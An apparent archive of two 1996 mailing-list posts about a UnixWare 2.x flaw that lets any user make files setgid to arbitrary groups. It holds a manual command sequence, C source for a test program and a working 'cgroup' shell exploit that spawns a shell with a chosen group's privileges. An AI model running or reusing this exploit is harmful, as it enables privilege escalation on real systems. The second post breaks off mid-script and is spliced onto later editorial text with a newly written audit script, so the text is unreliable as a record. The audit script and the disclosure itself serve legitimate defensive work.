From best-of-security-request@suburbia.net Sun Sep 01 23:25:07 1996
Return-Path:
Delivered-To: route@infonexus.com
Received: (qmail-queue invoked from smtpd); 1 Sep 1996 23:25:04 -0000
Received: from mail5.netcom.com (root@192.100.81.141)
  by onyx.infonexus.com with SMTP; 1 Sep 1996 23:25:03 -0000
Received: from pdx1.world.net (pdx1.world.net [192.243.32.18])
  by mail5.netcom.com (8.6.13/Netcom) id HAA11561; Sun, 1 Sep 1996 07:30:03 -0700
Received: from suburbia.net (suburbia.net [203.4.184.1])
  by pdx1.world.net (8.7.5/8.7.3) with ESMTP id HAA06733; Sun, 1 Sep 1996 07:25:34 -0700 (PDT)
Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id AAA19578; Mon, 2 Sep 1996 00:21:12 +1000
Resent-Date: Mon, 2 Sep 1996 00:21:12 +1000
Date: Mon, 2 Sep 1996 00:21:06 +1000
From: Julian Assange
Message-Id: <199609011421.AAA19562@suburbia.net>
To: best-of-security@suburbia.net
Resent-Message-ID: <"y81952.0.qn4.MlPAo"@suburbia>
Resent-From: best-of-security@suburbia.net
X-Mailing-List: archive/latest/310
X-Loop: best-of-security@suburbia.net
Precedence: list
Resent-Sender: best-of-security-request@suburbia.net
Subject: BoS: More on the UnixWare problem
Status: RO

I'm afraid to do this, but all, here's the source to that binary I posted.
Read it and gasp. :(

The vendor's been notified but it'll be a while before I see action. I've
contacted them; there's a trouble ticket open; I've also just learned that
someone has leaked the details and it's flowing around the net already.
CRINGE!

You'll note that I took pains to hide the program's function, for good
reason. I'd been through runaround at SCO for some time (I spent more than
an hour on hold today alone), but finally it was demonstrated to me by the
following command sequence by a kind SCO engineer that on UnixWare 2.x (not
just 2.0x, but 2.1 as well), the set-group-id privilege can be compromised
by *any user*.

% cp /usr/bin/ksh .
% chmod 2700 ./ksh
% chgrp 23456 ./ksh
% ./ksh
> id

And 'id' reports effective group ID of 23456. Oh, s**t. Watch out,
/dev/kmem. How about mode 775 directories? What, you say /usr/bin comes
that way by default, group 'bin'? Someone get me a bottle of Advil. Oh,
it's a high-security system? Make that a double--of codeine.

=====
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Second-stage marker: the program re-executes itself with this argument
 * once its own binary has been made setgid, so the child knows to report. */
#define KEYMATCH "\x1D\xFC\x3A\x2FMZ"
/* An arbitrary group the caller does not belong to.  If the re-executed
 * copy ends up with this as its effective gid, the kernel honoured a
 * chgrp + setgid done by an ordinary user. */
#define TESTGRP 17186

int main(int argc, char **argv)
{
    struct stat st, *s = &st;
    pid_t p;

    /* Second stage: we were exec'd by ourselves after the chgrp/chmod. */
    if (argc == 2 && !strcmp(argv[1], KEYMATCH)) {
        if (getegid() == TESTGRP) {
            /* Emit a random-looking "code" so the output does not read as
             * an obvious vulnerability report.  The byte shuffle is cosmetic. */
            unsigned long r;
            srandom(time(NULL));
            r = (unsigned long)random();
            r = (r & 0xFFFF00FF)
              | (((r & 0xFF000000) >> 16)
               ^ ((r & 0x00FF0000) >> 8)
               ^ ((r & 0x000000FF) << 8));
            fprintf(stderr, "%s: system vulnerable code 0x%lX\n", argv[0], r);
        } else {
            fprintf(stderr, "%s: system not vulnerable\n", argv[0]);
        }
        return 0;
    }

    /* First stage: sanity checks, then make our own binary setgid TESTGRP. */
    if (argc > 1) {
        fprintf(stderr, "%s: don't supply any arguments\n", argv[0]);
        return 0;
    }
    /* We chown/chmod argv[0] below, so it must be a usable path, not a
     * bare name that was resolved through $PATH. */
    if (!strchr(argv[0], '/')) {
        fprintf(stderr, "%s: user error: run me with a pathname, not in $PATH\n", argv[0]);
        return 0;
    }
    if (stat(argv[0], s)) {
        fprintf(stderr, "%s: system error: cannot stat my binary?\n", argv[0]);
        return 0;
    }
    if (s->st_uid != geteuid() && s->st_uid != getuid()) {
        fprintf(stderr, "%s: user error: does this uid own my binary?\n", argv[0]);
        return 0;
    }

    /* On a correct system this chown either fails (not a member of
     * TESTGRP) or the setgid bit set next is stripped.  On UnixWare 2.x
     * both go through. */
    chown(argv[0], -1, TESTGRP);
    if (chmod(argv[0], 02700)) {
        chown(argv[0], -1, s->st_gid);
        chmod(argv[0], s->st_mode);
        fprintf(stderr, "%s: user error: cannot chmod my own binary?\n", argv[0]);
        return 0;
    }

    /* vfork(), not fork(): the parent is suspended until the child execs,
     * so the original group and mode cannot be restored before the setgid
     * copy has actually started. */
    if ((p = vfork()) == -1) {
        fprintf(stderr, "%s: system error: cannot fork\n", argv[0]);
        return 0;
    }
    if (!p) {
        execl(argv[0], argv[0], KEYMATCH, (char *)NULL);
        fprintf(stderr, "%s: system error: cannot exec\n", argv[0]);
        _exit(0);
    }

    /* Parent: put the binary back the way it was. */
    chown(argv[0], -1, s->st_gid);
    chmod(argv[0], s->st_mode);
    return 0;
}

From best-of-security-request@suburbia.net Sun Sep 01 23:40:35 1996
Return-Path:
Delivered-To: route@infonexus.com
Received: (qmail-queue invoked from smtpd); 1 Sep 1996 23:40:33 -0000
Received: from mail6.netcom.com (root@192.100.81.142)
  by onyx.infonexus.com with SMTP; 1 Sep 1996 23:39:10 -0000
Received: from pdx1.world.net (pdx1.world.net [192.243.32.18])
  by mail6.netcom.com (8.6.13/Netcom) id HAA17462; Sun, 1 Sep 1996 07:32:05 -0700
Received: from suburbia.net (suburbia.net [203.4.184.1])
  by pdx1.world.net (8.7.5/8.7.3) with ESMTP id HAA06801; Sun, 1 Sep 1996 07:27:09 -0700 (PDT)
Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id AAA19793; Mon, 2 Sep 1996 00:24:06 +1000
Resent-Date: Mon, 2 Sep 1996 00:24:06 +1000
Date: Mon, 2 Sep 1996 00:23:58 +1000
From: Julian Assange
Message-Id: <199609011423.AAA19778@suburbia.net>
To: best-of-security@suburbia.net
Resent-Message-ID: <"KNua52.0.Br4.5oPAo"@suburbia>
Resent-From: best-of-security@suburbia.net
X-Mailing-List: archive/latest/311
X-Loop: best-of-security@suburbia.net
Precedence: list
Resent-Sender: best-of-security-request@suburbia.net
Subject: BoS: More on UnixWare 2.x vulnerability
Status: RO

I've found out more about UnixWare 2. It seems the system (and I don't
know if SCO's own native OSs do this, SCO UNIX/SCO XENIX/SCO OpenServer)
allows chown'ing a file *to* any arbitrary user and group. Hm, lessee.
Create a file that uses up all the available space in /tmp, then chown it
root:bin. Okay, now someone else tell me who created that file.

Anyway, back to the setgid problem. I've found an exploit script (it's not
all that difficult to do by hand, anyway...) on an FTP site pointed to by
the floating post about this bug. It follows.

While browsing the default installation of UnixWare, it seems a couple
*hundred* directories, including particularly /usr/bin, /sbin, and
/usr/sbin, are writable by group. This is bad, very bad.

=====
#!/bin/sh
# cgroup - pick a group id for unixware (run as cgroup )
cat >/tmp/.$$.c <<_end_
#include <unistd.h>
/* Make the real gid match the effective gid granted by the setgid bit,
 * then start a login shell ("-" as argv[0]) so sh does not drop it. */
int main(void) { setgid(getegid()); execl("/bin/sh", "-", (char *)0); }
_end_
cc -o /tmp/.$$ /tmp/.$$.c
rm -f /tmp/.$$.c
# Hand the binary to the requested group, then set setuid (to ourselves,
# harmless) + setgid ($1) with owner-execute only.
chgrp $1 /tmp/.$$
chmod 6100 /tmp/.$$
/tmp/.$$
r
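The two conditions these posts describe, a chgrp to a group the caller does not belong to with the setgid bit surviving it, and group-writable system directories full of setgid binaries, can be checked on a live host with the script below. This is an added example for this archive, not code from either post or from SCO. The script name, the function names and the PROBE_GID default of 23456 (the gid used in the first post) are assumptions; any gid the caller is not a member of works, and the chgrp probe is only meaningful when run as an ordinary user.

```shell
#!/bin/sh
# cgroup-audit.sh (constructed example): audit a host for the UnixWare 2.x
# setgid problem and for group/world-writable system directories.
#
#   sh cgroup-audit.sh /usr/bin /sbin /usr/sbin
#
# PROBE_GID is an arbitrary gid the caller should not be a member of
# (23456 mirrors the first post; override with PROBE_GID=... in the env).
PROBE_GID=${PROBE_GID:-23456}

# mode_string PATH: the 10-character ls(1) mode field, e.g. -rwxr-sr-x.
# Character 7 is the group-execute slot: 's' or 'S' means setgid is set.
mode_string() {
    ls -ld "$1" | cut -c1-10
}

# writable_dirs DIR...: every directory at or below the arguments that is
# group- or world-writable and not sticky (the /usr/bin mode 775, group bin
# case).  Octal -perm tests are POSIX find(1); output is sorted paths.
writable_dirs() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -type d \( -perm -020 -o -perm -002 \) ! -perm -1000 -print
    done | sort
}

# setgid_files DIR...: every regular file below the arguments with the
# setgid bit set.  Pair with ls -ln to see which group each one grants.
setgid_files() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -type f -perm -2000 -print
    done | sort
}

# chgrp_probe: recreate the posts' test on a scratch file.  A conforming
# kernel either refuses the chgrp or strips setgid afterwards; a host is
# reported VULNERABLE only if an ordinary user ends up with a file that is
# setgid to a group they are not in.
chgrp_probe() {
    f=$(mktemp) || return 1
    echo "_POSIX_CHOWN_RESTRICTED for $(dirname "$f"):" \
         "$(getconf _POSIX_CHOWN_RESTRICTED "$f" 2>/dev/null || echo unknown)"
    if ! chgrp "$PROBE_GID" "$f" 2>/dev/null; then
        echo "ok: chgrp to non-member gid $PROBE_GID refused"
    elif [ "$(id -u)" = 0 ]; then
        echo "inconclusive: running as root, which may chgrp to any group"
    else
        chmod 2700 "$f"
        case "$(mode_string "$f" | cut -c7)" in
            s|S) echo "VULNERABLE: $(id -un) made a file setgid to gid $PROBE_GID" ;;
            *)   echo "partial: chgrp succeeded but the setgid bit was stripped" ;;
        esac
    fi
    rm -f "$f"
    return 0
}

# Run the audit only when directories are given on the command line.
if [ $# -gt 0 ]; then
    chgrp_probe
    echo "--- group/world-writable, non-sticky directories ---"
    writable_dirs "$@"
    echo "--- setgid files under them ---"
    setgid_files "$@"
fi
```

Run it as an unprivileged user. `writable_dirs` recurses, so on a default UnixWare 2 tree it would list the directories the second post complains about rather than just the three named ones; `setgid_files` then shows what an attacker who can write into one of them could replace or add.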